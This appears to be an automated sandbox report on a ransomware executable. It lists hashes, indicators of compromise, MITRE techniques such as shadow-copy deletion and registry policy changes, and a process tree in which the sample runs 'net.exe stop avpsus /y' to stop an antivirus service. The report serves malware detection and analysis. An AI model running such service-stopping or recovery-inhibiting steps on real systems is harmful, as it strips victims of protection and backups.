1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
125s
max time network
138s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Size

107KB
MD5

26b35eb4806754b0e7d71b547478448e
SHA1

f0322d746071c1594ae37bae2467781f42e6ee3c
SHA256

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d
SHA512

6663d50e19ae58f6cc74f4edaa83b60a0f1cb42e8190056e444fc1c722cf7caccea488bb2e2fe250c039286e2fc4a3fb0520f40aea7f31734ea210cc6155b9b2

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\ExitSelect.tiff.b0spyl	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ExitSelect.tiff	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File created	C:\Users\Admin\Pictures\HideAdd.tiff.b0spyl	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\HideAdd.tiff	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File created	C:\Users\Admin\Pictures\ProtectWrite.raw.b0spyl	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File created	C:\Users\Admin\Pictures\SetInstall.tiff.b0spyl	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\SetInstall.tiff	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2356 cmd.exe

pid	process
2356	cmd.exe

Drops startup file 1 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
6420	vssadmin.exe
6332	vssadmin.exe
6480	vssadmin.exe
6472	vssadmin.exe
6276	vssadmin.exe
6308	vssadmin.exe
6340	vssadmin.exe
6432	vssadmin.exe
6440	vssadmin.exe
6456	vssadmin.exe
6252	vssadmin.exe
6448	vssadmin.exe
6464	vssadmin.exe
6348	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5432	taskkill.exe
5780	taskkill.exe
5908	taskkill.exe
4716	taskkill.exe
6228	taskkill.exe
5332	taskkill.exe
5388	taskkill.exe
5380	taskkill.exe
5664	taskkill.exe
5796	taskkill.exe
5920	taskkill.exe
5936	taskkill.exe
4260	taskkill.exe
6220	taskkill.exe
5520	taskkill.exe
5512	taskkill.exe
5504	taskkill.exe
1968	taskkill.exe
5216	taskkill.exe
5396	taskkill.exe
5656	taskkill.exe
5680	taskkill.exe
5840	taskkill.exe
5960	taskkill.exe
5952	taskkill.exe
4068	taskkill.exe
4664	taskkill.exe
6152	taskkill.exe
5612	taskkill.exe
1424	taskkill.exe
5316	taskkill.exe
5256	taskkill.exe
5596	taskkill.exe
6020	taskkill.exe
6004	taskkill.exe
1588	taskkill.exe
5168	taskkill.exe
5536	taskkill.exe
5220	taskkill.exe
5404	taskkill.exe
5672	taskkill.exe
5492	taskkill.exe
5768	taskkill.exe
5156	taskkill.exe
5228	taskkill.exe
5324	taskkill.exe
5604	taskkill.exe
5720	taskkill.exe
5824	taskkill.exe
6012	taskkill.exe
1476	taskkill.exe
6244	taskkill.exe
2272	taskkill.exe
5272	taskkill.exe
5648	taskkill.exe
6132	taskkill.exe
5544	taskkill.exe
5968	taskkill.exe
5812	taskkill.exe
2432	taskkill.exe
5264	taskkill.exe
5588	taskkill.exe
5788	taskkill.exe
5552	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3076 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
3076	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

pid	process
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Token: SeDebugPrivilege	5220	taskkill.exe
Token: SeDebugPrivilege	5300	taskkill.exe
Token: SeDebugPrivilege	5324	taskkill.exe
Token: SeDebugPrivilege	5332	taskkill.exe
Token: SeDebugPrivilege	5316	taskkill.exe
Token: SeDebugPrivilege	5272	taskkill.exe
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	5512	taskkill.exe
Token: SeDebugPrivilege	5156	taskkill.exe
Token: SeDebugPrivilege	5672	taskkill.exe
Token: SeDebugPrivilege	5264	taskkill.exe
Token: SeDebugPrivilege	5228	taskkill.exe
Token: SeDebugPrivilege	5396	taskkill.exe
Token: SeDebugPrivilege	5372	taskkill.exe
Token: SeDebugPrivilege	5720	taskkill.exe
Token: SeDebugPrivilege	5380	taskkill.exe
Token: SeDebugPrivilege	5404	taskkill.exe
Token: SeDebugPrivilege	5520	taskkill.exe
Token: SeDebugPrivilege	5388	taskkill.exe
Token: SeDebugPrivilege	5504	taskkill.exe
Token: SeDebugPrivilege	5432	taskkill.exe
Token: SeDebugPrivilege	5560	taskkill.exe
Token: SeDebugPrivilege	5536	taskkill.exe
Token: SeDebugPrivilege	5588	taskkill.exe
Token: SeDebugPrivilege	5656	taskkill.exe
Token: SeDebugPrivilege	5596	taskkill.exe
Token: SeDebugPrivilege	5664	taskkill.exe
Token: SeDebugPrivilege	5612	taskkill.exe
Token: SeDebugPrivilege	5700	taskkill.exe
Token: SeDebugPrivilege	5648	taskkill.exe
Token: SeDebugPrivilege	5920	taskkill.exe
Token: SeDebugPrivilege	5960	taskkill.exe
Token: SeDebugPrivilege	5552	taskkill.exe
Token: SeDebugPrivilege	5604	taskkill.exe
Token: SeDebugPrivilege	5952	taskkill.exe
Token: SeDebugPrivilege	5712	taskkill.exe
Token: SeDebugPrivilege	6132	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	5680	taskkill.exe
Token: SeDebugPrivilege	5788	taskkill.exe
Token: SeDebugPrivilege	6012	taskkill.exe
Token: SeDebugPrivilege	5840	taskkill.exe
Token: SeDebugPrivilege	5976	taskkill.exe
Token: SeDebugPrivilege	5824	taskkill.exe
Token: SeDebugPrivilege	5892	taskkill.exe
Token: SeDebugPrivilege	5908	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	5492	taskkill.exe
Token: SeDebugPrivilege	5168	taskkill.exe
Token: SeDebugPrivilege	5284	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	4664	taskkill.exe
Token: SeDebugPrivilege	6228	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	6244	taskkill.exe
Token: SeDebugPrivilege	5816	taskkill.exe
Token: SeDebugPrivilege	5136	taskkill.exe
Token: SeDebugPrivilege	5796	taskkill.exe
Token: SeDebugPrivilege	6020	taskkill.exe
Token: SeDebugPrivilege	5832	taskkill.exe
Token: SeDebugPrivilege	5936	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

pid process

1088 16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

pid process

1088 16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

mshta.exe

pid process

2988 mshta.exe
2988 mshta.exe

pid	process
2988	mshta.exe
2988	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exenet.exenet.exenet1.execonhost.exe

description	pid	process	target process
PID 1088 wrote to memory of 2044	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 2044	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 2044	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 2044	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 1164	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 1088 wrote to memory of 1164	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 1088 wrote to memory of 1164	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 1088 wrote to memory of 1164	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	cmd.exe
PID 1088 wrote to memory of 1960	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1960	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1960	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1960	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1964	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1964	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1964	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1964	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1352	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 1352	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 1352	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 1352	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net1.exe
PID 1088 wrote to memory of 1752	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1752	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1752	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1752	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1960 wrote to memory of 1768	1960	net.exe	net1.exe
PID 1960 wrote to memory of 1768	1960	net.exe	net1.exe
PID 1960 wrote to memory of 1768	1960	net.exe	net1.exe
PID 1960 wrote to memory of 1768	1960	net.exe	net1.exe
PID 1964 wrote to memory of 1744	1964	net.exe	wmiprvse.exe
PID 1964 wrote to memory of 1744	1964	net.exe	wmiprvse.exe
PID 1964 wrote to memory of 1744	1964	net.exe	wmiprvse.exe
PID 1964 wrote to memory of 1744	1964	net.exe	wmiprvse.exe
PID 2044 wrote to memory of 1788	2044	net1.exe	net1.exe
PID 2044 wrote to memory of 1788	2044	net1.exe	net1.exe
PID 2044 wrote to memory of 1788	2044	net1.exe	net1.exe
PID 2044 wrote to memory of 1788	2044	net1.exe	net1.exe
PID 1088 wrote to memory of 316	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	conhost.exe
PID 1088 wrote to memory of 316	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	conhost.exe
PID 1088 wrote to memory of 316	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	conhost.exe
PID 1088 wrote to memory of 316	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	conhost.exe
PID 1088 wrote to memory of 1480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1652	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1652	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1652	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1652	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1540	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1540	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1540	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1540	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1532	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1532	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1532	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 1532	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 316 wrote to memory of 520	316	conhost.exe	net.exe
PID 316 wrote to memory of 520	316	conhost.exe	net.exe
PID 316 wrote to memory of 520	316	conhost.exe	net.exe
PID 316 wrote to memory of 520	316	conhost.exe	net.exe
PID 1088 wrote to memory of 480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe
PID 1088 wrote to memory of 480	1088	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1088
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:1788
